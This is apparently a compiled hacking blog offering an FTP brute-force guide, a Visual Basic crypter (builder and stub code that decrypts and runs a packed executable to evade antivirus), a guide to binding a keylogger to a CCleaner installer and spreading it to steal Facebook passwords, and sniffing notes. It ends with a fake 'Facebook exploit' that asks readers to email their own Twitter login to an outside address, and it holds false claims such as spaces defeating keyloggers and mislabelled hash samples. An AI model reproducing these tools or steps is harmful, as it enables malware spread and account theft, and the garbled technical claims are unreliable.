Monday, February 21, 2011

FTPFTP is an application or service or protocol  which can be used to transfer files from one place to another  place ,it really comes very handy  during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading  unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.

What is Brute-Force?

Brute-force is a type of attack in which every  possible combination of letters, digits and special characters are  tried until the right password is matched  with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password.Here I will be using this attack to crack the password.So,lets start….
Requirements:
  1. The tool we will be using  ” BrutusA2”(Download: http://www.hoobie.net/brutus/)
  2. You need to know the target suppose “ftp://123.123.xx.xxx”

Procedure:

Step 1.Here I have shown an authentication page of an FTP service in the image below and in the following steps we will crack its password using brutus.

Step 2.Now open up “Brutus” and type  your desire target ,select wordlist and select “FTP” from the drop down menu  and click start. If you are confused then follow the image below.


Step 3.The time it takes as I mentioned above depends on the complexity and length of the password.So after clicking the start button wait for the time as mentioned in the tool.The password will be displayed as shown above.
Recommendation: I would recommend the readers to try it in a virtual environment as I did and enjoy the trick.It is not advisable to try it on some unknown user without prior permission.
Passwords can be categorized into various types based on their composition. Let us take a look at these types to enhance our understanding of password cracking.
•Passwords that contain only letters: As rightly inferred, these contain just alphabets and are the easiest to crack. Example: "secret"

•Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"
•Passwords that contain only special characters: These passwords consist of only special characters. They are easy to crack in accordance with their decreasing length. Example: "*%$%@"
•Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or numerals. Examples: "a3rf5"
•Passwords that contain only letters and special characters and passwords that contain only special characters and numbers are quite similar to the preceding one. Examples: "df%g$i", "39*&4"
•Passwords that contain letters, special characters and numbers are considered to be the most secure as the combination can be difficult to crack. Given an appropriate length, they can be considered to be safe and if encrypted well, safe on the network as well. Example: "a#d5y8%"


************************************************************************


NOTE: Well friends, this is nowhere documented that, the most secure password contains [SPACES]. Using spaces in your password, it will become the strongest. Using spaces, you can easily bypass trojans & keylogers(almost 100%). I recommend to use 3-4 spaces as prefix of your password. For e.g. suppose you password is : "iamsweet123" without quote


Instead of this password, use "iamsweet123 ". Now what is the difference. Have a closer look. In the later one you will see that its excetely "iamsweet123[space][space][space]"
This is an article over some common forms of encryption and some examples of what they look like.

Cryptography-
Cryptography is often associated to encryption, or hiding information from others except the desired party. This usually involves having a certain knowledge of the encryption, also known as a key. This has been used for centuries by military and governments to hide and transfer data. For example, In ancient days, One King would shave a subjects head, then tattoo the message on the subjects head. This way the subject did not know what the message was either. Then, after his hair grew back, he would be sent to the other king and his head would be shaved, then when the king had the message, the subject was killed and the message was disposed of. So, step by step this is the general way an encryption works. First, find a viable way to hide the message. Second, Find a safe way to transport the message and, third decrypt the message. Now inside of each step there is a good amount of detail.

Encrypting the message-
There are many common ways to encrypt data. For instance, a shift cipher. In shift cipher you shift each letter a certain amount of letters in the alphabet. EXAMPLE: In a cipher with a key of one, you would switch each letter one letter in the alphabet. So A would become B, and a word like HIDDEN would become IJEEDO. Thus rendering the message illegible. Now the reason you would not want to use a simple shift cipher is because of how easy it is to "crack" the encryption. "Cracking" an encryption is basically brute forcing the key, or by gaining the key through other means such as: Trojans, Social Engineering or one of the other many ways. As for our shift cipher, also known as a "caeser cipher" if it is a shift of three or as ROT-13 if it is a 13 letter shift, It would be very easy to just decrypt the message by hand or to write a simple program that can decrypt the massage in mere moments.

The Difference Between Hashing And Encrypting-
Encryption is a scheme where an plaintext is made into ciphertext using a secure key. The security of the ciphers reside in the key length and decryption process is a difficult without proper knowledge of the key.

As for hashing, The best way to describe a has is a one-way function that compresses arbitrary length strings into fixed short strings. Hashes can be designed using block ciphers using a secret key as a parameter along with the message that has to be hashed or with out them (dedicated hash functions MD4,MD5,SHA-1 etc..).

Here I will describe a few common hashes, Along with why the are not secure, And some examples of what they look like.

MD5 (Message-Digest algorithm 5)-
MD5 was created in 1991 in order to replace the less secure MD4. Although a serious flaw was found in this form of encryption it is still widely used. Cryptographers Suggest the use of more secure algorithms such as SHA-1, or WhirlPool. MD5 is a 128 but hash which makes it rather small and thus makes it vulnerable to the birthday attack (which I will include at the end). The algorithm for MD5 is also open source which makes this form of encryption rather easy to break. Not only those but Md5 hashes are also vulnerable to man-in-the-middle attacks, and gain the first three characters, Enabling easier brute forcing on the hash.

Here are some examples of An MD5 hash:
Hidden: 662f707d5491e9bce8238a6c0be92190
Hellboundhackers: 07113826bfa7f58ef0ccf537ab9b5d0e

And here is the psudocode for it

Source: Wikipedia
//Note: All variables are unsigned 32 bits and wrap modulo 2^32 when calculating
var int[64] r, k

//r specifies the per-round shift amounts
r[ 0..15] := {7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22}
r[16..31] := {5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20}
r[32..47] := {4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23}
r[48..63] := {6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21}

//Use binary integer part of the sines of integers (Radians) as constants:
for i from 0 to 63
k[i] := floor(abs(sin(i + 1)) × (2 pow 32))

//Initialize variables:
var int h0 := 0x01234567
var int h1 := 0x89ABCDEF
var int h2 := 0xFEDCBA98
var int h3 := 0x76543210

//Pre-processing:
append "1" bit to message
append "0" bits until message length in bits = 448 (mod 512)
append bit /* bit, not byte */ length of unpadded message as 64-bit little-endian integer to message

//Process the message in successive 512-bit chunks:
for each 512-bit chunk of message
break chunk into sixteen 32-bit little-endian words w[i], 0 = i = 15

//Initialize hash value for this chunk:
var int a := h0
var int b := h1
var int c := h2
var int d := h3

//Main loop:
for i from 0 to 63
if 0 = i = 15 then
f := (b and c) or ((not b) and d)
g := i
else if 16 = i = 31
f := (d and b) or ((not d) and c)
g := (5×i + 1) mod 16
else if 32 = i = 47
f := b xor c xor d
g := (3×i + 5) mod 16
else if 48 = i = 63
f := c xor (b or (not d))
g := (7×i) mod 16

temp := d
d := c
c := b
b := b + leftrotate((a + f + k[i] + w[g]) , r[i])
a := temp

//Add this chunk's hash to result so far:
h0 := h0 + a
h1 := h1 + b
h2 := h2 + c
h3 := h3 + d

var int digest := h0 append h1 append h2 append h3 //(expressed as little-endian)

SHA-1 -
SHA stands for Secure Hash Algorithm. This algorithm makes a 160 but algorithm. SHA-1 is only one of the many SHA-* styles, but it the most common and most secure. Some other SHA styles are: SHA-224, SHA-256, SHA-384, and SHA-512. These make a hash that is the amount of bits in their name. For example, SHA-224 is a 224 bit hash. The reason that this form of encryption is insecure is because a modified version of a collision attack can be performed and through this method you can get up to a quarter of the hash into plaintext. Thus making it cracked in principle.

Here are some examples of SHA hashes:

Hidden- 7acdf85c69cc3c5305456a293524386e
Hellboundhackers- 07113826bfa7f58ef0ccf537ab9b5d0e

SHA-2 and the others have no attacks reported, but SHA-1 has an attack based on a mathematical system that allows it to be cracked. Even though the others have no reported attacks, SHA-3 is in the making. This one will be the standard SHA in 2012, after the competition is over. This competition takes place from 2008-2011.

Common Encryption:

Binary-
Binary is a base-2 "language" used in computing to specify either on (1), or off (0). This was commonly used to make plaintext hidden from most people. Binary uses an 8-bit per character format that is very easily noticed by almost anyone, considering that is consist solely of 0's and 1's. These can be easily broken with a copy of any ASCII chart or a very easily written program. One other reason that it is not used, besides its insecurities, is the fact of how much space it takes to store a binary encryption, and how long it takes to encrypt things into binary. Think of it this way, For every one character of plaintext, there are 8 in binary. This means a relative large file will not only take a long time to encrypt, It will also be a massive file to transfer.

DES -

DES is based on a symmetrical key algorithm that has a 56 bit key. Now this is the chief reason that this form of encryption is so insecure is the rather small size of the key. There are public programs that can break a DES encryption in 22 hours and 15 minutes. These have made the US along with many other countries turn to more secure means of encryption.

Examples:

Hidden: CREAE8aHr13jY
Hellboundhackers: CRNg1HW8ckWJk

Base 64- Base 64 uses 64 printable ASCII characters to encrypt data. The characters are A-Z, a-z, and 0-9. Then The other two vary from OS to OS. Sometimes this also includes a suffix of an = operator. Base 64 is often very easily identified and can easily be deciphered with an easily accessible algorithm to decrypt it.

Hidden: SGlkZGVuIA==
Hellboundhackers: SGVsbGJvdW5kaGFja2Vycw==

And there are many many others.

Creating your own:

So you think you may want to create a more secure encryption method? Well your in for a surprise at how challenging it really is. First you have to come up with your encryption style... rather it be algorithm based or something else. Then, you must decide on transferring the Key and how. This must also be secure. Then on decrypting the cipher.
Well one problem you will face is what is a secure algorithm and what is not. The more advanced the algorithm does not mean a more secure encryption. Also another problem is how fast the program can do the algorithm. An advanced algorithm may be secure, but if it takes three days to decrypt with the key, Is it worth using? And then with the key, there are a few ways to transfer the key safely. One way is like the spy movie, a guy with a briefcase handcuffed to his wrist. A more feasible way would be to meet the person and exchange it. or you could just use a more common encryption method and send it to them in e-mail. Or one last slow way would be to Mail them the key. Either way you must decide how you will keep it secure on the way.

Some common attacks on cryptography:

DoS-
DoS (Denial of Service) attacks are when someone tries to make a service or action incapable of usage. One very unlikely method, But possible, would be cutting the victims internet cable. This renders them incapable of accessing the said source. Although this attack is usually used on a web-server, this can also be used to stop an encryption from ever reaching its intended party. Another way this attack could be carried out would be to send a server a massive amount if request, and keeping the server busy.

Man In The Middle (MITM)-
MITM is where the attacker makes a connection with the host then passes the message to the other host, making them believe that they are talking directly to each other over a private connection although the conversation is controlled solely by the attacker. The attacker then would intercept messages and send new ones.

Birthday Attack-
In this attack you use mathematics to exploit collisions. This is a rather formidable attack because of how efficient it is, especially if the function hold a lot of matches in the psudorandom lookup of matches in collisions.

Cryptanalysis-
cryptanalysis is also known as code breaking or cracking a code. Although this does not necessarily imply encryption, it is one major part of cracking. this form usually excludes attacks such as the ones mentioned above, social engineering, burglary, or keylogging. In the past one way to crack an encryption was to use a frequency analysis, or seeing what type of characters appear most. For instance the letter "E" is the most common in English, and the digraph "TH" is the most common. In practice it relies on as much linguistic knowledge as it does statistics. As encryption got more and more detailed, mathematics became more of a major player in cracking. In modern times the advanced computations in an encryption have made cryptanalysis less of a key player, than in the past when pen-and-paper encryptions were used.
So in order to sum this up, I will use this quote.
"Breaking a cipher simply means finding a weakness in the cipher that can be exploited with a complexity less than brute force. Never mind that brute-force might require 2^128 encryptions; an attack requiring 2^110 encryptions would be considered a break...simply put, a break can just be a certificational weakness: evidence that the cipher does not perform as advertised." (Schneier, 2000).
Facebook has Keyboard Shortcuts to make your navigation easier. It is an automatic feature which is already enabled. You can now use shortcuts to quickly jump from facebook home page to any page.
List of FacebooK Keyboard Shortcuts
§                     Alt + 1 Return to FB Homepage                                             
§                     Alt + 2 To goto Wall Tab of your Profile Page
§                     Alt + 3 To view Friends Requests list Drop down List
§                     Alt + 4 To view latest Messages list in Drop down List
§                     Alt + 5 To view Notification list Drop down List
§                     Alt + 6 To goto Account setting Webpage
§                     Alt + 7 To goto Account privacy configuration Webpage
§                     Alt + 8 To open Facebook fan page at facebook.com/facebook
§                     Alt + 9 To open Facebook’s Statement of Rights & Responsibilities
§                     Alt + 0 To open Facebook Help Center
§                     Alt + m To create New Message
§                     Alt + ? For Cursor control in the Search Box
Above Keyshortcuts works with Chrome and IE . Firefox users  can use  Shift key along with above key combinations for Example Shift+Alt + 1 also note that there is no need to use + sign while using shortcut keys.

How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain


The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks)
.

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name itcommondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.


Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.

Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398
.............................................................................................................................................
Hello friends today i will explain you how to hack the Facebook password or accounts remotely usingkeylogger. Its a 100% working hack and you can easily hack anyone's Facebook account or password using this hack. In this tutorial i will explain you how to hack Facebook and other passwords of any user using 100% FUD keylogger. The keylogger in this tutorial we will discuss is L33ts keylogger and its 100% FUD(fully undetectable).

Hacking Facebook account
 is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

NOTE: This tutorial is for Educational purposes only i.e. to make you aware how hackers hack your Facebook accounts. Please don't misuse it. I and fb is not responsible for any damage caused by you. 

 So guys lets start hacking Facebook account or passwords....
Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server
1. Download the keylogger.
2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

hack facebook password,how to hack facebook,how to hack a facebook account

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.


Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker. 
3. Now in menu there is one action button click on it and then click save all resources.

how to hack facebook passwords,facebook hack, how to hack into someones facebook


4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).


Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.

facebook password hack,how to hack someones facebook,facebook password hacker,facebook hacking


5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.


Step4 : How to Spread Keylogger or send it to victim or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it. 
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes. 

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked softwares and don't download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.
There are two types of hijacking attacks:
  1. Active:-In an active attack, an attacker finds an active session and takes over.
     
  2. Passive: With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.
Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session.
Generally a passive attack uses sniffers on the network allowing the attacker to obtain information such as user id and password so that he can use it later to logon as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed when raw access to a network is obtained.
Counters against this attack range from using identification schemes such as one-time password (e.g. skey) to ticketing identification (such as Kerberos). While these may keep sniffing from yielding any productive results, they do not insure the network from an active attack neither as long as the data is neither digitally signed nor encrypted.
In an active attack, the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating by being the man-in-the-middle. These have been discussed at length under the discussion covering the various steps involved in a session hijack.
This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number.
 


Passive Sniffing


A packet sniffer is seldom the only tool used for an attack. This is because a sniffer can work only in a common collision domain. A common collision domain is a network segment that is not switched or bridged (i.e. connected through a hub). Any traffic that is not switched or bridged on a network segment can be seen by all machines on that segment. As sniffers gather packets at Data Link Layer it can potentially grab all the packets on the LAN of the machine running the Sniffer program.
This is because on a network with a hub implements a broadcast medium shared by all systems on the LAN. Any data sent across the LAN is actually sent to each and every machine connected to the LAN. If an attacker runs a Sniffer on one system on LAN, he can gather data sent to and from any other system on the LAN. Majority of the Sniffer tools are ideally suited to sniff data in a hub environment. These tools are called passive sniffers as they passively wait for the data to be sent and capture them. They are efficient in silently gathering the data from the LAN.

Note
In passive sniff ing, the intruder gets access to the network by any of the following methods.

  • By compromising the physical security. An example of this can be the intruder walking into the building with his laptop and capturing data by plugging in to access the network.

  • Using a Trojan horse. Many Trojans have sniffing capability built into them. For instance, the Back Orifice server has a plugin known as "Butt Trumpet". Butt Trumpet will send the attacker an email when the server has been installed. Once the attacker knows that the victim's machine has been compromised, the attacker can then install a packet sniffer and use it.

Active Sniffing



One countermeasure against passive sniffing is to replace the network hub with a switch. Unlike a hub based network, switched ethernet does not broadcast all information to all systems on the LAN. The switch regulates the flow of data between its ports by actively monitoring the MAC address on each port, which helps it pass data only to its intended target.
In other words, the main difference between a switch and hub is that while a hub has no mapping, and thus broadcasts line data to every port on the device, a switch looks at the MAC address associated with each frame passing through it and sends the data to the required connection on the switch.
The switch thereby limits the data that a passive sniffer can gather. If there is a passive sniffer activated on a switched LAN, the sniffer will only be able to see data going to and from one machine - i.e. the system on which it is installed.
However, it must be noted that the development of switched networks was driven by the need for more bandwidth, and not for the need of more secure networks. Since the evolution was not driven by security needs, there are ways to circumvent this network posture and sniff the traffic.
So how does an attacker sniff on a switched LAN? The sniffers for a switched LAN actively inject traffic into the LAN to enable sniffing of the traffic. Hence the term 'active sniffing'. Some of the methods used in the attack include ARP Spoofing, MAC Flooding and MAC Duplicating etc.
EtherFlood


  • EtherFlood floods a switched network with Ethernet frames with random hardware addresses.

  • The effect on some switches is that they start sending all traffic out on all ports so that the attacker is able to sniff all traffic on the network.
In a switched network, the ARP table ensures that IP addresses are mapped to MAC addresses . However, this does not stop sniffing, as we see in ARP Spoofing. One way to sniff in a switched network is to convert the functionality of a switch to that of a hub.
In other words, to make a switch change its default directed output to broadcast method . One way of accomplishing this is to foil the switch by flooding the network with too many frames. When this happens, some switches become unable to perform the IP to MAC mappings and then "fail out" to broadcasting.

Tools
EtherFlood floods a switched network with Ethernet frames with random hardware addresses. The effect on some switches is that they start sending all traffic out on all ports so that sniffing of the switched network traffic is possible.

dsniff


  • dsniff is a collection of tools for network auditing and penetration testing.

  • dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

  • arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching).

  • sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).
Written by Dug Song, this collection of tools (bundled with the main dsniff utility) has certain unique functionality. However, they can be categorized as having similar baseline functionality. In general, the tools dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy can be used to sniff on a compromised host behind a firewall and look for interesting content.
These tools can be put to good use by network administrators or be used to obtain sensitive information such as login information that is sent in the clear or is weakly encrypted. These tools can also auto detect various messaging protocols (about 30 are included) when dsniff is launched with the "-m" option.
urlsnarf is capable of intercepting all http requests from the network it is deployed on, and formatting them into the Common Log Format (CLF) used by MS IIS and Apache. This makes it possible to conduct a log analysis by using suitable programs to interpret the results obtained from urlsnarf. urlsnarf is hard-coded to listen on ports 80 (where clear text http resides) as well as port 3128 (MS-proxy) and 8080 (generic proxy).
arpspoof, dnsspoof, and macof work on the interception of switched network traffic that is usually unavailable to a sniffer program due to the segment switching that occurs at the ISO layer 2 level. sshmitm and webmitm implement active man-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
⇒ Learn How To Hack Any FaceBook Account Using A Web Based Exploit
Do you want to learn how to hack facebook?, Are you looking for a way to hack your friends facebook account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack facebook user accounts without having to directly hack into facebook and risk getting caught. Ignore all those hacking services, facebook hacks and hackers that charge you money for something you can do on your own for free. Hack the password of any of your friends accounts and get their password even as a prank or joke (you may also be interested in trying our How To Hack Twitter Accounts tutorial).

Hack facebook, hacking facebook passwords from user accounts and find out someones facebook password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe Facebook is with a few celebrities having had their accounts hacked. You may also have seen Twitter allows you to synchronize your tweets with Facebook status updates so whatever you tweet appears as a Facebook status update. In providing this service, Facebook has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Facebooks API service which permits exterior websites or applications (like FarmVille) to modify or post stuff on your profile.

A couple of month's ago I wanted to check my old FaceBook account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a facebook account hacking code or exploit as they are called.
HOW HACKING FACEBOOK ACCOUNTS WORKS
Facebook has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned FaceBook uses something similar to an email service to contact their databases.

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Facebooks 'Mutual Friend' feature, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Facebook...you can use your Twitter account to verify your their friend on Facebook taking advantage of the vulnerability of the twitter status sync exploit, and get their login email and password sent to you. But the victim must be on your friends list on Facebook.
HOW TO DO IT
1) First off you will need to get your user id and the victims user id, how do you do this?

Go to the victims profile, then click on their Display Picture (not the "View Photos of ..." link or tab but the actual main picture of their profile) and look at your browsers address bar, at the end of all the address you should see a group of numbers that should you should look something like this: (I have used a red arrow to point them out)



Don't worry if it isn't exactly like that (sometimes it has variations like; 'album.php?profile=10957800008') just as long as you get the numbers. Write them down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the facebook user id of the victim and the twitter friend authentication information. I will give you step by step examples by trying the exploit code on my friend Laura's account as the victim, see what parts you have to edit and with what:



1. Should be the victims user id.
2. Should be your twitter login Username (I put my email in the screencap example above for privacy reasons) to verify your the victims mutual friend on facebook. Make sure your facebook email was the same used to sign up to Twitter so the exploit script can automatically connect both accounts.
3. Should be your twitter password so the database can authentic you really are friends with the victim on facebook.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to fbsupport@techie.com which is their customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
$[search_database = $find user+id= "123456789", '%verification+user+bday' = }"01/01/1900"{ begin_search();


Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:



1. The email address of the facebook database's forgotten password customer service.
2. This is where you insert the victims facebook user id.
3. This is where you insert your birthday so the database can find you to verify your a friend of the victim (it arranges users in the database based on your date of birth), NOTE: It MUST be in the MONTH/DAY/YEAR format so it can read it properly.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email.Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic FaceBook has that day, this is a sample of the email response you'll receive:


THE EXPLOIT CODE
fb_select_db("find", $linkID) or die(fbdatabase_error());
$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(fbdatabase_error());

$num_rows = db_num_rows($resultID);
$row = facebook_fetch_array($resultID);
$user_id = $row[0];

if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
